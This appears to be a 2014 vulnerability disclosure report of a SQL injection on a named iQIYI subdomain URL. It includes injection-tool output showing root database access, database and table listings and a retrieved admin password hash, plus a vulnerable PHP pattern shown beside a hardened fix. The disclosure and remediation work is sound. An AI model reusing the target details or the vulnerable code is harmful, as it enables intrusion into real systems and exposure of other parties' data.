2014-01-12: Details reported to the vendor, awaiting vendor handling
2014-01-12: Vendor has confirmed; details disclosed to the vendor only
2014-01-22: Details disclosed to core white hats and relevant domain experts
2014-02-01: Details disclosed to ordinary white hats
2014-02-11: Details disclosed to intern white hats
2014-02-26: Details disclosed to the public
It seems like a low-value finding and I did not dig any further, but the application connects to MySQL as root, which is confirmed to be quite dangerous.
Affected URL: http://tcl.iqiyi.com/index.php?action=daoyanjianjie&id=14

Retrieving the current database user:
[23:27:01] [INFO] testing MySQL
[23:27:01] [INFO] confirming MySQL
[23:27:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
[23:27:01] [INFO] fetching current user
current user: 'root@localhost'
Retrieving the database names:
[23:22:45] [INFO] fetching database names
[23:22:45] [INFO] the SQL query used returns 14 entries
[23:22:45] [INFO] resumed: "information_schema"
[23:22:45] [INFO] resumed: "ccs"
[23:22:45] [INFO] resumed: "cmdb_vip"
[23:22:45] [INFO] resumed: "common_cms"
[23:22:45] [INFO] resumed: "hk"
[23:22:45] [INFO] resumed: "ims"
[23:22:45] [INFO] resumed: "mysql"
[23:22:45] [INFO] resumed: "suc"
[23:22:45] [INFO] resumed: "t_eye"
[23:22:45] [INFO] resumed: "tcl"
[23:22:45] [INFO] resumed: "tcl_test"
[23:22:45] [INFO] resumed: "test"
[23:22:45] [INFO] resumed: "weixin"
[23:22:45] [INFO] resumed: "wx"
available databases [14]:
[*] ccs
[*] cmdb_vip
[*] common_cms
[*] hk
[*] ims
[*] information_schema
[*] mysql
[*] suc
[*] t_eye
[*] tcl
[*] tcl_test
[*] test
[*] weixin
[*] wx
Retrieving all tables of one database:
[23:11:11] [INFO] starting 10 threads
[23:11:12] [INFO] retrieved: "tp_article"
[23:11:12] [INFO] retrieved: "tp_areply"
[23:11:12] [INFO] retrieved: "tp_access"
[23:11:12] [INFO] retrieved: "tp_flash"
[23:11:13] [INFO] retrieved: "tp_follow"
[23:11:13] [INFO] retrieved: "tp_adma"
[23:11:13] [INFO] retrieved: "tp_call"
[23:11:13] [INFO] retrieved: "tp_diymen_class"
[23:11:13] [INFO] retrieved: "tp_case"
[23:11:13] [INFO] retrieved: "tp_home"
[23:11:13] [INFO] retrieved: "tp_api"
[23:11:13] [INFO] retrieved: "tp_company"
[23:11:13] [INFO] retrieved: "tp_host"
[23:11:13] [INFO] retrieved: "tp_host_order"
[23:11:13] [INFO] retrieved: "tp_diymen_set"
[23:11:14] [INFO] retrieved: "tp_host_list_add"
[23:11:14] [INFO] retrieved: "tp_indent"
[23:11:14] [INFO] retrieved: "tp_function"
[23:11:14] [INFO] retrieved: "tp_lottery"
[23:11:14] [INFO] retrieved: "tp_keyword"
[23:11:14] [INFO] retrieved: "tp_classify"
[23:11:14] [INFO] retrieved: "tp_member_card_coupon"
[23:11:14] [INFO] retrieved: "tp_member_card_contact"
[23:11:14] [INFO] retrieved: "tp_member_card_create"
[23:11:14] [INFO] retrieved: "tp_dream"
[23:11:14] [INFO] retrieved: "tp_img"
[23:11:14] [INFO] retrieved: "tp_member_card_exchange"
[23:11:14] [INFO] retrieved: "tp_member"
[23:11:14] [INFO] retrieved: "tp_member_card_info"
[23:11:14] [INFO] retrieved: "tp_member_card_sign"
[23:11:15] [INFO] retrieved: "tp_member_card_vip"
[23:11:15] [INFO] retrieved: "tp_member_card_set"
[23:11:15] [INFO] retrieved: "tp_member_card_integral"
Obtained the administrator password in its stored (hashed) form; it is hard to crack, so this counts as a fairly low-value SQL injection:
[01:54:56] [INFO] fetching SQL SELECT statement query output: 'select user_pass from tcl.admin'
[01:54:56] [INFO] the SQL query used returns 1 entries
[01:54:56] [INFO] retrieved: "1c161ff0c3892f845d0cb4928287753e"
select user_pass from tcl.admin; [1]:
[*] 1c161ff0c3892f845d0cb4928287753e
This host does not appear to belong to iQIYI, but since it uses an iQIYI subdomain the issue was reported to iqiyi. Another company's database, weixin, also sits on the same host; because the connection runs as root it could be dumped, exposing that company's usernames, passwords and so on.
Fix suggestion: filter the parameters.
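The fix the report suggests, as an added example written for this page (it is not the site's own code, and the table and column names, the account name tcl_web and the DB_PASSWORD environment variable are all hypothetical): the vulnerable pattern the report implies for the `id` parameter, next to a hardened handler that validates the type, binds the value with a prepared statement, and connects with a least-privilege account instead of root.

```php
<?php
// Added example, not the site's code. Table/column names are hypothetical.

// --- Vulnerable pattern: the raw query-string value is concatenated into SQL ---
function get_article_vulnerable(mysqli $db, array $get): ?array
{
    $id  = $get['id'];                                        // untrusted input
    $sql = "SELECT title, body FROM article WHERE id = $id";  // injectable
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened: validate the type, then bind the value via a prepared statement ---
function get_article_safe(PDO $db, array $get): ?array
{
    // 1. Strict type validation: only a positive integer is an acceptable id.
    $id = filter_var(
        $get['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // 2. Parameterised query: the bound value can never alter the statement's structure.
    $stmt = $db->prepare('SELECT title, body FROM article WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Least privilege: connect as a dedicated account limited to this application's
//    database, not as root. Then even an injection that slips through elsewhere
//    cannot read the other databases on the same MySQL server.
//    Run once by an administrator (hypothetical names):
//      CREATE USER 'tcl_web'@'localhost' IDENTIFIED BY '<strong-password>';
//      GRANT SELECT, INSERT, UPDATE ON tcl.* TO 'tcl_web'@'localhost';
$pdo = new PDO(
    'mysql:host=localhost;dbname=tcl;charset=utf8mb4',
    'tcl_web',
    getenv('DB_PASSWORD'),
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,  // use native server-side prepares
    ]
);

$article = get_article_safe($pdo, $_GET);
```

The integer check alone would already stop the injection for this parameter, but the prepared statement is what makes the handler safe for string parameters as well, and the restricted account is what keeps one flaw from turning into access to every database on the host, which is the "root@localhost" risk the report points out.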
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2014-01-12 22:26
Thank you for the vulnerability you provided; we will speed up the fix!
None yet